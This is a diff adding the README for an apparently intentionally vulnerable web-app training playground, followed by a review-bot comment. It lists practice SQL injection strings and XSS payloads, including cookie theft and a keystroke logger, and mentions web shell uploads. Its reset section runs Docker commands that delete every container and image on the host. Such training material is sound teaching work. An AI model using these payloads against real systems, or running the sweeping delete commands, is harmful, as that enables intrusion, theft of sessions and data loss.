|
| 1 | +# 516 Hackers Vulnerability Playground 🔓 |
| 2 | + |
| 3 | +An intentionally vulnerable web application designed for security training, similar to DVWA but modular. Perfect for learning about web vulnerabilities in a safe, controlled environment. |
| 4 | + |
| 5 | + |
| 6 | + |
| 7 | + |
| 8 | + |
| 9 | + |
| 10 | +## ⚠️ IMPORTANT WARNING |
| 11 | + |
| 12 | +**FOR TRAINING AND EDUCATIONAL PURPOSES ONLY** |
| 13 | + |
| 14 | +- 🚫 **DO NOT** deploy in production environments |
| 15 | +- 🚫 **DO NOT** expose to the internet |
| 16 | +- 🚫 **DO NOT** use with real/sensitive data |
| 17 | +- ✅ **ONLY** use in isolated, local environments |
| 18 | +- ✅ **ONLY** for legitimate security training |
| 19 | + |
| 20 | +## 🚀 Quick Start |
| 21 | + |
| 22 | +### Prerequisites |
| 23 | +- Docker and Docker Compose installed |
| 24 | +- Git installed |
| 25 | +- At least 2GB free disk space |
| 26 | + |
| 27 | +### Step-by-Step Setup |
| 28 | + |
| 29 | +#### 1. Clone the Repository |
| 30 | +```bash |
| 31 | +# Clone using HTTPS |
| 32 | +git clone https://github.com/516hackers/516-hackers-vuln-playground.git |
| 33 | + |
| 34 | +# Or using SSH |
| 35 | +git clone git@github.com:516hackers/516-hackers-vuln-playground.git |
| 36 | + |
| 37 | +# Navigate to project directory |
| 38 | +cd 516-hackers-vuln-playground |
| 39 | +``` |
| 40 | + |
| 41 | +#### 2. Build and Run with Docker |
| 42 | +```bash |
| 43 | +# Build and start all services |
| 44 | +docker-compose up --build |
| 45 | + |
| 46 | +# To run in background (detached mode) |
| 47 | +docker-compose up -d --build |
| 48 | +``` |
| 49 | + |
| 50 | +#### 3. Access the Application |
| 51 | +Open your browser and navigate to: |
| 52 | +``` |
| 53 | +http://localhost:3000 |
| 54 | +``` |
| 55 | + |
| 56 | +#### 4. Verify Installation |
| 57 | +You should see the main dashboard with four vulnerability modules. The application comes pre-loaded with sample data. |
| 58 | + |
| 59 | +## 🛠️ Project Structure |
| 60 | + |
| 61 | +``` |
| 62 | +516-hackers-vuln-playground/ |
| 63 | +├── docker-compose.yml # Multi-container setup |
| 64 | +├── README.md # This file |
| 65 | +├── backend/ |
| 66 | +│ ├── package.json # Node.js dependencies |
| 67 | +│ ├── server.js # Main Express server |
| 68 | +│ ├── Dockerfile # Backend container setup |
| 69 | +│ ├── routes/ # Vulnerability modules |
| 70 | +│ │ ├── sqli.js # SQL Injection |
| 71 | +│ │ ├── xss.js # Cross-site Scripting |
| 72 | +│ │ ├── auth.js # Authentication Bypass |
| 73 | +│ │ └── file-upload.js # File Upload vulnerabilities |
| 74 | +│ └── database/ |
| 75 | +│ └── init.sql # Database schema and sample data |
| 76 | +├── frontend/ |
| 77 | +│ ├── index.html # Main interface |
| 78 | +│ ├── css/ |
| 79 | +│ │ └── style.css # Styling |
| 80 | +│ └── js/ |
| 81 | +│ └── app.js # Frontend logic |
| 82 | +└── scripts/ |
| 83 | + ├── test-sqli.js # SQLi testing scripts |
| 84 | + ├── test-xss.js # XSS testing scripts |
| 85 | + └── test-auth.js # Auth testing scripts |
| 86 | +``` |
| 87 | + |
| 88 | +## 📚 Vulnerability Modules |
| 89 | + |
| 90 | +### 1. SQL Injection (SQLi) 💉 |
| 91 | +**Location**: SQL Injection module in the web interface |
| 92 | + |
| 93 | +**Vulnerable Endpoint**: `/sqli/search` |
| 94 | + |
| 95 | +**Practice Payloads**: |
| 96 | +```sql |
| 97 | +-- Basic bypass |
| 98 | +admin' OR '1'='1 |
| 99 | + |
| 100 | +-- Union attack |
| 101 | +' UNION SELECT 1,2,3,4,5-- - |
| 102 | +
|
| 103 | +-- Database enumeration |
| 104 | +' UNION SELECT version(),user(),database(),4,5-- - |
| 105 | + |
| 106 | +-- Table extraction |
| 107 | +' UNION SELECT table_name,2,3,4,5 FROM information_schema.tables-- - |
| 108 | +``` |
| 109 | +
|
| 110 | +**Learning Objectives**: |
| 111 | +- Understand how SQL injection works |
| 112 | +- Learn to exploit authentication bypass |
| 113 | +- Practice data extraction techniques |
| 114 | +- Compare vulnerable vs secure code |
| 115 | +
|
| 116 | +### 2. Cross-Site Scripting (XSS) 🦠 |
| 117 | +**Location**: XSS module in the web interface |
| 118 | +
|
| 119 | +**Vulnerable Endpoint**: `/xss/comment` |
| 120 | +
|
| 121 | +**Practice Payloads**: |
| 122 | +```html |
| 123 | +<!-- Basic alert --> |
| 124 | +<script>alert('XSS')</script> |
| 125 | +
|
| 126 | +-- Image-based XSS |
| 127 | +<img src=x onerror=alert(1)> |
| 128 | +
|
| 129 | +-- Cookie theft |
| 130 | +<script>fetch('http://localhost:3000/steal?cookie='+document.cookie)</script> |
| 131 | +
|
| 132 | +-- Keylogger |
| 133 | +<script>document.onkeypress=function(e){fetch('http://localhost:3000/log?key='+e.key)}</script> |
| 134 | +``` |
| 135 | +
|
| 136 | +**Learning Objectives**: |
| 137 | +- Understand reflected vs stored XSS |
| 138 | +- Learn DOM-based XSS techniques |
| 139 | +- Practice input sanitization methods |
| 140 | +- Compare vulnerable vs secure implementations |
| 141 | +
|
| 142 | +### 3. Authentication Bypass 🔑 |
| 143 | +**Location**: Authentication Bypass module |
| 144 | +
|
| 145 | +**Vulnerable Endpoint**: `/auth/login-weak` |
| 146 | +
|
| 147 | +**Practice Techniques**: |
| 148 | +```sql |
| 149 | +-- SQL injection in login |
| 150 | +admin' OR '1'='1'-- - |
| 151 | + |
| 152 | +-- Password field bypass |
| 153 | +admin' OR '1'='1'-- - |
| 154 | +
|
| 155 | +-- Always true condition |
| 156 | +' OR 1=1-- - |
| 157 | +``` |
| 158 | + |
| 159 | +**Learning Objectives**: |
| 160 | +- Understand weak authentication mechanisms |
| 161 | +- Learn session management vulnerabilities |
| 162 | +- Practice privilege escalation |
| 163 | +- Implement secure authentication |
| 164 | + |
| 165 | +### 4. File Upload Vulnerabilities 📁 |
| 166 | +**Location**: File Upload module |
| 167 | + |
| 168 | +**Vulnerable Endpoint**: `/file-upload/insecure` |
| 169 | + |
| 170 | +**Practice Uploads**: |
| 171 | +- PHP shell files |
| 172 | +- Executable files with dangerous extensions |
| 173 | +- Overwrite existing files |
| 174 | +- Path traversal in filenames |
| 175 | + |
| 176 | +**Learning Objectives**: |
| 177 | +- Understand unrestricted file upload risks |
| 178 | +- Learn file type validation |
| 179 | +- Practice secure upload configurations |
| 180 | +- Implement proper file sanitization |
| 181 | + |
| 182 | +## 🔧 Management Commands |
| 183 | + |
| 184 | +### Starting and Stopping |
| 185 | +```bash |
| 186 | +# Start services |
| 187 | +docker-compose up |
| 188 | + |
| 189 | +# Start in background |
| 190 | +docker-compose up -d |
| 191 | + |
| 192 | +# Stop services |
| 193 | +docker-compose down |
| 194 | + |
| 195 | +# Stop and remove volumes (reset data) |
| 196 | +docker-compose down -v |
| 197 | + |
| 198 | +# View logs |
| 199 | +docker-compose logs |
| 200 | + |
| 201 | +# View specific service logs |
| 202 | +docker-compose logs web |
| 203 | +docker-compose logs db |
| 204 | +``` |
| 205 | + |
| 206 | +### Database Operations |
| 207 | +```bash |
| 208 | +# Access MySQL database |
| 209 | +docker-compose exec db mysql -u root -p vuln_app |
| 210 | +# Password: password |
| 211 | + |
| 212 | +# Reset database |
| 213 | +docker-compose down -v |
| 214 | +docker-compose up -d |
| 215 | +``` |
| 216 | + |
| 217 | +### Development Commands |
| 218 | +```bash |
| 219 | +# Access backend container |
| 220 | +docker-compose exec web sh |
| 221 | + |
| 222 | +# Install new dependencies |
| 223 | +docker-compose exec web npm install <package> |
| 224 | + |
| 225 | +# View application logs |
| 226 | +docker-compose logs web -f |
| 227 | +``` |
| 228 | + |
| 229 | +## 🧪 Testing Scripts |
| 230 | + |
| 231 | +Run automated tests to verify vulnerabilities: |
| 232 | + |
| 233 | +```bash |
| 234 | +# Test SQL Injection vulnerabilities |
| 235 | +node scripts/test-sqli.js |
| 236 | + |
| 237 | +# Test XSS vulnerabilities |
| 238 | +node scripts/test-xss.js |
| 239 | + |
| 240 | +# Test authentication bypass |
| 241 | +node scripts/test-auth.js |
| 242 | +``` |
| 243 | + |
| 244 | +## 🎯 Learning Path |
| 245 | + |
| 246 | +### Beginner Level |
| 247 | +1. Start with SQL Injection module |
| 248 | +2. Try basic payloads like `admin' OR '1'='1` |
| 249 | +3. Understand how the vulnerable code works |
| 250 | +4. Compare with the secure version |
| 251 | + |
| 252 | +### Intermediate Level |
| 253 | +1. Practice advanced SQLi techniques |
| 254 | +2. Experiment with different XSS payloads |
| 255 | +3. Try authentication bypass methods |
| 256 | +4. Understand session management issues |
| 257 | + |
| 258 | +### Advanced Level |
| 259 | +1. Chain multiple vulnerabilities |
| 260 | +2. Write custom exploit scripts |
| 261 | +3. Analyze the secure code implementations |
| 262 | +4. Propose additional security improvements |
| 263 | + |
| 264 | +## 🔒 Security Best Practices Demonstrated |
| 265 | + |
| 266 | +Each module includes both **vulnerable** and **secure** implementations: |
| 267 | + |
| 268 | +### SQL Injection Protection |
| 269 | +- **Vulnerable**: String concatenation in queries |
| 270 | +- **Secure**: Parameterized queries with prepared statements |
| 271 | + |
| 272 | +### XSS Protection |
| 273 | +- **Vulnerable**: Direct output without sanitization |
| 274 | +- **Secure**: Input validation and output encoding |
| 275 | + |
| 276 | +### Authentication Security |
| 277 | +- **Vulnerable**: Plain text passwords, SQL in authentication |
| 278 | +- **Secure**: Password hashing, parameterized queries, session management |
| 279 | + |
| 280 | +### File Upload Security |
| 281 | +- **Vulnerable**: No file type checking, original filenames |
| 282 | +- **Secure**: Whitelist validation, safe filenames, size limits |
| 283 | + |
| 284 | +## 🐛 Troubleshooting |
| 285 | + |
| 286 | +### Common Issues |
| 287 | + |
| 288 | +**Port already in use**: |
| 289 | +```bash |
| 290 | +# Change ports in docker-compose.yml |
| 291 | +ports: |
| 292 | + - "3001:3000" # Use different host port |
| 293 | +``` |
| 294 | + |
| 295 | +**Database connection issues**: |
| 296 | +```bash |
| 297 | +# Reset everything |
| 298 | +docker-compose down -v |
| 299 | +docker-compose up --build |
| 300 | +``` |
| 301 | + |
| 302 | +**Application not loading**: |
| 303 | +```bash |
| 304 | +# Check if all services are running |
| 305 | +docker-compose ps |
| 306 | + |
| 307 | +# Check logs for errors |
| 308 | +docker-compose logs |
| 309 | +``` |
| 310 | + |
| 311 | +**File uploads not working**: |
| 312 | +```bash |
| 313 | +# Ensure upload directories exist |
| 314 | +mkdir -p backend/uploads backend/secure-uploads |
| 315 | + |
| 316 | +# Check directory permissions |
| 317 | +chmod 755 backend/uploads backend/secure-uploads |
| 318 | +``` |
| 319 | + |
| 320 | +### Reset Everything |
| 321 | +```bash |
| 322 | +# Complete reset |
| 323 | +docker-compose down -v |
| 324 | +docker rm -f $(docker ps -aq) |
| 325 | +docker rmi -f $(docker images -q) |
| 326 | +docker-compose up --build |
| 327 | +``` |
| 328 | + |
| 329 | +## 📖 Educational Resources |
| 330 | + |
| 331 | +### Recommended Learning Materials |
| 332 | +- OWASP Top 10 |
| 333 | +- Web Application Security Testing methodologies |
| 334 | +- Secure coding practices |
| 335 | +- Penetration testing frameworks |
| 336 | + |
| 337 | +### Next Steps After This Playground |
| 338 | +1. Try other vulnerable applications (DVWA, WebGoat, bWAPP) |
| 339 | +2. Practice on bug bounty platforms (with permission) |
| 340 | +3. Study secure coding guidelines |
| 341 | +4. Explore advanced exploitation techniques |
| 342 | + |
| 343 | +## 🤝 Contributing |
| 344 | + |
| 345 | +We welcome contributions! Please: |
| 346 | + |
| 347 | +1. Fork the repository |
| 348 | +2. Create a feature branch |
| 349 | +3. Make your changes |
| 350 | +4. Add tests if applicable |
| 351 | +5. Submit a pull request |
| 352 | + |
| 353 | +### Adding New Vulnerabilities |
| 354 | +1. Create new route file in `backend/routes/` |
| 355 | +2. Add frontend interface in `frontend/` |
| 356 | +3. Update navigation in `frontend/index.html` |
| 357 | +4. Add test scripts in `scripts/` |
| 358 | +5. Update this README |
| 359 | + |
| 360 | +## 📄 License |
| 361 | + |
| 362 | +This project is for educational purposes only. Use responsibly and only in environments you own or have explicit permission to test. |
| 363 | + |
| 364 | +## 🆘 Support |
| 365 | + |
| 366 | +If you encounter issues: |
| 367 | +1. Check the troubleshooting section above |
| 368 | +2. Review Docker and system requirements |
| 369 | +3. Check the GitHub issues page |
| 370 | +4. Create a new issue with detailed information |
| 371 | + |
| 372 | +--- |
| 373 | + |
| 374 | +**Remember**: With great power comes great responsibility. Use these skills ethically and legally! 🛡️ |
| 375 | + |
| 376 | +--- |
| 377 | + |
| 378 | +*Created with ❤️ by 516 Hackers for the security community* |
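Review bot: the port example under "Port already in use" (`- "3001:3000"`) publishes the application on every host interface, which works against the warning section's "DO NOT expose to the internet" and "ONLY use in isolated, local environments". Suggest binding to loopback in the example, `- "127.0.0.1:3001:3000"`, and stating in Quick Start that the app is meant to be reachable only at `http://localhost:3000`. Separately, "Reset Everything" runs `docker rm -f $(docker ps -aq)` and `docker rmi -f $(docker images -q)`, which delete every container and image on the machine, not only this project's. `docker-compose down -v --rmi local` followed by `docker-compose up --build` keeps the reset scoped to the playground. Minor: in the XSS payload block the later comments use `--` inside an `html` fence while the first uses `<!-- -->`, and the two Authentication Bypass entries "SQL injection in login" and "Password field bypass" show the same string, so the README should say which field each one goes in.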